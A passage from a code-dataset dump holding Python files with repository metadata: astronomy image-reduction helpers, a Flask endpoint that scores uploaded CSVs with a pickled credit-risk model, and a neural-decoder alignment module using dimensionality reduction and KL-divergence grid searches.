make_name(lib: str, algo: str, sub_type: str, first_chnl: str, last_chnl: str, ncomp: int=None, nskip_frames: int=None) -> str:\n if ncomp is None:\n ncomp = numcomps\n if nskip_frames is None:\n nskip_frames = everynthframe\n \n algo_text = algo if \"PCA\" not in algo else \"PCA%03i\"%ncomp\n name = f\"{lib}{algo_text}-{sub_type}_{first_chnl}-{last_chnl}_skip{nskip_frames}\"\n return name\n\ndef combine(channels: np.ndarray,\n combine_fn: Callable[[np.ndarray], np.ndarray]=np.median,\n out_path: str=None) -> np.ndarray:\n \n adi_combined = combine_fn(channels, axis=0)\n\n if out_path is not None:\n to_fits(adi_combined, out_path)\n\n return adi_combined", "repo_name": "asatk/exoadi", "sub_path": "mypkg/redux/redux_utils.py", "file_name": "redux_utils.py", "file_ext": "py", "file_size_in_byte": 2947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "attribute"}, {"api_name": "astropy.io.ascii.read", "line_number": 37, "usage_type": "call"}, {"api_name": "astropy.io.ascii", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 36, "usage_type": "attribute"}, {"api_name": "vip_hci.fits.open_fits", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 42, "usage_type": "attribute"}, {"api_name": "multiprocessing.Pool", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 51, "usage_type": "call"}, {"api_name": "vip_hci.fits.write_fits", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 69, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 71, "usage_type": "attribute"}]} +{"seq_id": "73508993474", "text": "import os\nfrom flask import Request, Response\nimport pandas\nimport pickle\nimport numpy\n\nABSOLUTE_PATH = os.getcwd()\n\n\n# cargamos la ruta donde está almacenado el modelo riesgo de credito\nRELATIVE_PATH_RISK = '/models/scorecard_model.pickle'\n\nMODEL_PATH = ABSOLUTE_PATH + RELATIVE_PATH_RISK\n\n# cargamos el modelo del riesgo\npickle_model = pickle.load(open(MODEL_PATH, 'rb'))\n\n\nmin_score = 300\nmax_score = 850\n\n\ndef condition(predited_value): return predited_value[1]\n\n\ndef get_risk_data_post(request: Request):\n file_uploaded = request.files[\"file\"]\n\n # definimos la data de prueba\n test_data = pandas.read_csv(file_uploaded, sep=r\",|;\", engine='python')\n\n print(test_data)\n\n prediccion = pickle_model.score(test_data)\n\n result_prediccion = pandas.Series(prediccion)\n result_prediccion = result_prediccion.astype(numpy.int64)\n\n return result_prediccion.to_json(orient=\"table\")\n\n\ndef get_risk_data_get():\n return Response('La peticion se debe realizar con el metodo POST', status=400)\n", "repo_name": "jumarinr/endpoints_tae", "sub_path": "api/predict_risk.py", "file_name": "predict_risk.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.Request", "line_number": 26, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.Response", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "44750634397", "text": "import numpy as np\r\nfrom scipy.signal import find_peaks\r\nfrom scipy.linalg import sqrtm\r\nimport time\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.manifold import MDS\r\nfrom sklearn.decomposition import FactorAnalysis\r\nfrom sklearn.manifold import Isomap\r\nfrom sklearn.neighbors import NearestNeighbors\r\nimport matplotlib.pyplot as plt\r\nfrom decoder import utils\r\n\r\n\r\ndef run_DAD_3D(X_train, Y_test, T_train, X_test, T_test, grid_size=5, dim_red_method=\"PCA\", num_T=0, check_2D=False):\r\n k = 3 # align in 3 dimensions\r\n\r\n if (k == 3) and (np.size(X_train, 1) == 2):\r\n X_train = map_X_3D(X_train)\r\n\r\n X_n = normal(X_train)\r\n Y_r = remove_const_cols(Y_test)\r\n\r\n t1 = time.time()\r\n V_r = compute_V(Y_r, map_X_3D(X_test), T_test, d=k, methods=[dim_red_method])\r\n t2 = time.time()\r\n\r\n print(f'Finished computing the low-d embedding in {(t2 - t1) / 60:.2f} minutes.')\r\n\r\n X_rec = []\r\n V_out = []\r\n V_flip = []\r\n min_KL = []\r\n\r\n for i in range(len(V_r)):\r\n X_rec_tmp, V_out_tmp, V_flip_tmp, min_KL_tmp = DAD_3D_search(X_n, normal(V_r[i]), grid_size, num_T, check_2D)\r\n X_rec.append(X_rec_tmp)\r\n V_out.append(V_out_tmp)\r\n V_flip.append(V_flip_tmp)\r\n min_KL.append(min_KL_tmp)\r\n\r\n return np.array(X_rec)[0, :, :]\r\n\r\n\r\ndef map_X_3D(X):\r\n return np.column_stack((X[:, 0], X[:, 1], np.linalg.norm(X, axis=1)))\r\n\r\n\r\ndef normal(X):\r\n mean_X = np.mean(X, axis=0)\r\n cov_X = np.cov(X, rowvar=False)\r\n X_n = X\r\n #for col in range(X.shape[1]):\r\n # X_n[:, col] = (X_n[:, col] - mean_X[col]) / np.sqrt(cov_X[col, col])\r\n return np.matmul(X_n - mean_X, np.linalg.inv(sqrtm(cov_X)))\r\n\r\n\r\ndef remove_const_cols(Y):\r\n return Y[:, ~np.all(Y[1:] == Y[:-1], axis=0)]\r\n\r\n\r\ndef compute_V(Y, X_test, T_test, d=3, methods=['PCA', 'MDS', 'FA', 'Isomap']):\r\n L = len(methods)\r\n V = []\r\n for idx in range(L):\r\n if methods[idx] == 'PCA':\r\n pca = PCA(n_components=d)\r\n V.append(pca.fit_transform(Y))\r\n elif methods[idx] == 'MDS':\r\n mds = MDS(n_components=d)\r\n V.append(mds.fit_transform(Y))\r\n elif methods[idx] == 'FA':\r\n fa = FactorAnalysis(n_components=d)\r\n V.append(fa.fit_transform(Y))\r\n elif methods[idx] == 'Isomap':\r\n isomap = Isomap(n_components=d)\r\n V.append(isomap.fit_transform(Y))\r\n\r\n plt.figure(figsize=(8,6))\r\n plt.subplot(1, 2, 1)\r\n utils.color_data(X_test, T_test)\r\n plt.title('Ground Truth')\r\n plt.subplot(1, 2, 2)\r\n utils.color_data(V[0], T_test)\r\n plt.title('FA')\r\n plt.show()\r\n\r\n return V\r\n\r\n\r\ndef DAD_3D_search(X_n, V_r, grid_size=8, num_T=1, check_2D=False):\r\n t1 = time.time()\r\n V_out = grid_search_3D_KL(X_n, V_r, grid_size, num_T)\r\n t2 = time.time()\r\n\r\n print(f'Finished performing 3D alignment in {(t2 - t1) / 60:.2f} minutes.')\r\n\r\n num_ang = 90\r\n\r\n t1 = time.time()\r\n X_rec_3D, V_flip_3D, y_3D, inds_3D = rotated_KL_min(V_out[:, 0:2], X_n[0:2, :], num_ang)\r\n t2 = time.time()\r\n\r\n print(f'Finished performing the final 2D rotation in {(t2 - t1) / 60:.2f} minutes.')\r\n\r\n if check_2D:\r\n X_rec_2D, V_flip_2D, y_2D, inds_2D = rotated_KL_min(V_r[:, 0:2], X_n[:, 0:2], num_ang)\r\n\r\n if np.amin(y_3D[inds_3D]) < np.amin(y_2D[inds_2D]):\r\n X_rec = X_rec_3D\r\n min_KL = y_3D[inds_3D]\r\n else:\r\n X_rec = X_rec_2D\r\n min_KL = y_2D[inds_2D]\r\n V_out = V_r\r\n\r\n V_flip = []\r\n sort_inds = np.argsort(np.hstack((y_2D[inds_2D], y_3D[inds_3D])))\r\n\r\n for i in range(10):\r\n if sort_inds[i] < inds_2D.size:\r\n V_flip[i] = V_flip_2D[sort_inds[i]]\r\n else:\r\n V_flip[i] = V_flip_3D[sort_inds[i]]\r\n\r\n else:\r\n V_flip = V_flip_3D\r\n X_rec = X_rec_3D\r\n min_KL = y_3D[inds_3D]\r\n\r\n return X_rec, V_out, V_flip, min_KL\r\n\r\n\r\ndef grid_search_3D_KL(X_target, Y_source, num_A, num_T):\r\n mean_weight = 0.7\r\n KL_thr = 5\r\n nz_var = 0.5\r\n fine_grid = 10\r\n bsz = 50\r\n num_samples = 500000\r\n k0 = k1 = 5\r\n grid_size = num_A\r\n\r\n xx, yy, zz = np.meshgrid(np.linspace(-1, 1, grid_size), np.linspace(-1, 1, grid_size), np.linspace(-1, 1, grid_size))\r\n\r\n F_mat = np.column_stack((xx.flatten('F'), yy.flatten('F'), zz.flatten('F')))\r\n F_mat = np.concatenate((np.array([0, 0, 1])[np.newaxis, :], F_mat[np.linalg.norm(F_mat, ord=2, axis=1) > 0.1, :]), axis=0)\r\n\r\n if num_T > 1:\r\n t_vec = np.vstack(([0, 0, 0], np.random.randn(num_T, 3) * nz_var))\r\n else:\r\n t_vec = np.array([0, 0, 0])\r\n\r\n sample_loc = sample_from_3D_grid(bsz, num_samples)\r\n p_train = prob1(sample_loc, normal(X_target), k0)\r\n\r\n try:\r\n dists1 = np.load('dists1.npy')\r\n except IOError:\r\n if num_T > 0:\r\n dists1 = np.full((F_mat.shape[0], num_T if num_T > 1 else 1), 0.0)\r\n else:\r\n dists1 = np.full(F_mat.shape[0], 0.0)\r\n\r\n for i in range(F_mat.shape[0]):\r\n an0 = F_mat[i, :]\r\n Y_rot = rotate_data(Y_source, an0)\r\n\r\n p_rot = prob1(sample_loc, normal(Y_rot), k1)\r\n\r\n if num_T > 0:\r\n dists1[i, 0] = np.matmul(p_rot.T, np.log(p_rot / p_train))\r\n if dists1[i, 0] < KL_thr and num_T > 1:\r\n for j in range(1, num_T):\r\n Y_rot2 = Y_rot + t_vec[j, :]\r\n p_rot = prob1(sample_loc, Y_rot2, k1)\r\n dists1[i, j] = np.matmul(p_rot.T, np.log(p_rot / p_train))\r\n\r\n KL_thr = min(KL_thr, np.mean(dists1[dists1 != 100]) * mean_weight)\r\n else:\r\n dists1[i] = np.matmul(p_rot, np.log(p_rot / p_train))\r\n\r\n np.save('dists1.npy', dists1)\r\n plt.plot(dists1)\r\n plt.title('3D Grid Search')\r\n plt.xlabel('Rotation Angle')\r\n plt.ylabel('KL Divergence')\r\n plt.show()\r\n # select best angle of rotation\r\n values = np.amin(dists1, axis=0)\r\n ind = np.argmin(dists1, axis=0)\r\n\r\n if num_T > 1:\r\n ind = ind[np.argmin(values)]\r\n\r\n angle_ind = ind\r\n\r\n an0 = F_mat[angle_ind, :]\r\n Y_curr = rotate_data(Y_source, an0)\r\n\r\n if num_T > 1:\r\n t_curr = t_vec[ind, :]\r\n else:\r\n t_curr = [0, 0, 0]\r\n\r\n # final translation\r\n t_vec2 = np.random.randn(np.power(fine_grid, 3), 3) * nz_var + np.matlib.repmat(t_curr, np.power(fine_grid, 3), 1)\r\n\r\n dists2 = np.zeros(t_vec2.shape[0])\r\n for i in range(t_vec2.shape[0]):\r\n Y_rot2 = Y_curr + np.matlib.repmat(t_vec2[i, :], Y_curr.shape[0], 1)\r\n nbrs = NearestNeighbors(n_neighbors=1).fit(X_target)\r\n distances, dvec = nbrs.kneighbors(Y_rot2)\r\n dists2[i] = np.mean(dvec)\r\n\r\n ind = np.argmin(dists2)\r\n return Y_curr + np.matlib.repmat(t_vec2[ind,:], Y_curr.shape[0], 1)\r\n\r\n\r\ndef sample_from_3D_grid(bsz, num_samples, x_min=-4, x_max=4, y_min=-4, y_max=4, z_min=-4, z_max=4):\r\n x1, y1, z1 = np.meshgrid(np.linspace(x_min, x_max, bsz - 1), np.linspace(y_min, y_max, bsz - 1), np.linspace(z_min, z_max, bsz - 1))\r\n x_t = np.column_stack((x1.flatten('F'), y1.flatten('F'), z1.flatten('F')))\r\n N = x_t.shape[0]\r\n\r\n return x_t[np.random.permutation(N)[0:min(num_samples, N)], :]\r\n\r\n\r\ndef prob1(X1, x_t, k=1):\r\n nbrs = NearestNeighbors(n_neighbors=k).fit(x_t)\r\n distances, indices = nbrs.kneighbors(X1)\r\n rho_X1 = distances[:, -1]\r\n p1 = k / (X1.shape[0] * np.power(rho_X1, np.full(rho_X1.shape[0], x_t.shape[1])))\r\n return p1 / p1.sum()\r\n\r\n\r\ndef rotate_data(Y_curr, an0):\r\n an0 = an0 / np.linalg.norm(an0)\r\n v1 = [0, 0, 1]\r\n if np.array_equal(v1, an0):\r\n rot_mat = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])\r\n elif np.array_equal(v1, -an0):\r\n rot_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, -1]])\r\n else:\r\n rot_mat = np.array([[np.dot(v1, an0), -np.linalg.norm(np.cross(v1, an0)), 0], [np.linalg.norm(np.cross(v1, an0)), np.dot(v1, an0), 0], [0, 0, 1]])\r\n basis_mat = np.column_stack((v1, (an0 - v1) / np.linalg.norm(an0 - v1), np.cross(an0, v1)))\r\n try:\r\n rot_mat = np.matmul(np.matmul(basis_mat, rot_mat), np.linalg.inv(basis_mat))\r\n except np.linalg.LinAlgError:\r\n print(an0)\r\n print(basis_mat)\r\n\r\n Y_rot = np.matmul(Y_curr, rot_mat.T)\r\n return Y_rot - np.mean(Y_rot)\r\n\r\n\r\ndef rotated_KL_min(V, X_tr, num_A, fit_skew=0):\r\n k = 3\r\n num_peaks = 10\r\n\r\n if V.shape[1] != X_tr.shape[0]:\r\n print(V.shape, X_tr.shape)\r\n print('Target & test set are not the same dimension!')\r\n\r\n ang_vals = np.linspace(0, np.pi, num_A)\r\n cos_g = np.cos(ang_vals)\r\n sin_g = np.sin(ang_vals)\r\n VL_r = []\r\n y = np.zeros(2 * num_A)\r\n for p in range(2 * num_A):\r\n pm = p % num_A\r\n ps = 2 * np.floor((p-1) / num_A) - 1\r\n rm = np.matmul([[ps, 0], [0, 1]], [[cos_g[pm], -sin_g[pm]], [sin_g[pm], cos_g[pm]]])\r\n\r\n if fit_skew != 0:\r\n sx = 0.2 + 0.2 * np.arange(1, 8)\r\n sy = 0.2 + 0.2 * np.arange(1, 8)\r\n\r\n ys = np.zeros(7 * 7)\r\n VL_rs = []\r\n\r\n for s1 in range(0, 7):\r\n for s2 in range(0, 7):\r\n s_mat = [[sx[s1], 0], [0, sy[s2]]]\r\n VL_rs.append(normal(V * rm * s_mat))\r\n ys[s1 * 7 + s2] = eval_KL(VL_rs[s1 * 7 + s2], X_tr, k)\r\n\r\n y[p] = np.amin(ys)\r\n VL_r[p] = VL_rs[np.argmin(ys)]\r\n\r\n else:\r\n VL_r.append(normal(np.matmul(V, rm)))\r\n ys = eval_KL(VL_r[p], X_tr.T, k)\r\n y[p] = np.mean(ys)\r\n\r\n plt.plot(y)\r\n plt.xlabel('Rotation Angle')\r\n plt.ylabel('KL Divergence')\r\n plt.title('2D Rotation')\r\n plt.axvline(x=np.argmin(y))\r\n plt.show()\r\n\r\n V_out = VL_r[np.argmin(y)]\r\n\r\n peak_inds, peak_properties = find_peaks((np.amax(y) - y) / np.amax(y), height=0.0)\r\n\r\n peak_heights = peak_properties['peak_heights']\r\n\r\n descending_inds = np.argsort(peak_heights)[::-1]\r\n flip_inds = peak_inds[descending_inds]\r\n\r\n #V_flip = VL_r[flip_inds.tolist()]\r\n V_flip = []\r\n for i in range(len(peak_inds)):\r\n V_flip.append(VL_r[peak_inds[i]])\r\n\r\n return V_out, V_flip, y, flip_inds\r\n\r\n\r\ndef eval_KL(X, X_out, k=0):\r\n b_size = 50\r\n\r\n if k == 0:\r\n k0 = np.round(np.power(X.shape[1], 1 / 3))\r\n k1 = np.round(np.power(X_out.shape[1], 1 / 3))\r\n else:\r\n k0 = k1 = k\r\n\r\n\r\n if X.shape[1] == 3:\r\n p_train = prob_grid_3D(normal(X).T, b_size, k0)\r\n p_rot = prob_grid_3D(normal(X_out).T, b_size, k1)\r\n elif X.shape[1] == 2:\r\n p_train = prob_grid(normal(X).T, b_size, k0)\r\n p_rot = prob_grid(normal(X_out).T, b_size, k1)\r\n\r\n return error_nocenter(np.log(p_train), np.log(p_rot), X.shape[1])\r\n\r\n\r\ndef prob_grid_3D(X, b_size=50, k=0):\r\n return prob_grid(X[:, 0:2], b_size, k)\r\n\r\n\r\ndef prob_grid(X, b_size=50, k=0):\r\n w_size = 1\r\n\r\n X_n = X\r\n\r\n xy_max = np.amax(X_n) + w_size\r\n xy_min = np.amin(X_n) - w_size\r\n\r\n grid_axis = np.linspace(xy_min, xy_max, b_size)\r\n\r\n x1, y1 = np.meshgrid(grid_axis, grid_axis)\r\n\r\n return prob1(np.column_stack((x1.flatten('F'), y1.flatten('F'))), X_n.T, k)\r\n\r\n\r\ndef error_nocenter(p_train, p_rot, dim, num=1):\r\n if dim == 3:\r\n L = np.floor(np.power(p_train.shape[0], 1 / 3)).astype(int)\r\n pt = np.reshape(p_train, (L, L, L))\r\n pr = np.reshape(p_rot, (L, L, L))\r\n\r\n L_mid = np.floor(L / 2).astype(int)\r\n bd = np.zeros((L, L, L))\r\n bd[L_mid - num : L_mid + num, L_mid - num : L_mid + num, L_mid - num : L_mid + num] = 1\r\n\r\n elif dim == 2:\r\n L = np.floor(np.power(p_train.shape[0], 1 / 2)).astype(int)\r\n pt = np.reshape(p_train, (L, L))\r\n pr = np.reshape(p_rot, (L, L))\r\n\r\n L_mid = np.floor(L / 2).astype(int)\r\n bd = np.zeros((L, L))\r\n bd[L_mid - num: L_mid + num, L_mid - num: L_mid + num] = 1\r\n\r\n inds = bd != 1\r\n\r\n return np.linalg.norm(pt[inds] - pr[inds]) / np.linalg.norm(pr[inds])\r\n", "repo_name": "nerdslab/DAD", "sub_path": "decoder/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 12059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.size", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 54, "usage_type": "attribute"}, {"api_name": "scipy.linalg.sqrtm", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 58, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.manifold.MDS", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.decomposition.FactorAnalysis", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.manifold.Isomap", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "decoder.utils.color_data", "line_number": 80, "usage_type": "call"}, {"api_name": "decoder.utils", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "decoder.utils.color_data", "line_number": 83, "usage_type": "call"}, {"api_name": "decoder.utils", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "time.time", "line_number": 91, "usage_type": "call"}, {"api_name": "time.time", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.matlib", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.matlib", "line_number": 210, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.matlib.repmat", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.matlib", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 224, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 236, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.cross", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 246, "usage_type": "attribute"}, {"api_name": "numpy.linalg", "line_number": 247, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 301, "usage_type": "call"}, {"api_name": "scipy.signal.find_peaks", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 354, "usage_type": "call"}, {"api_name": 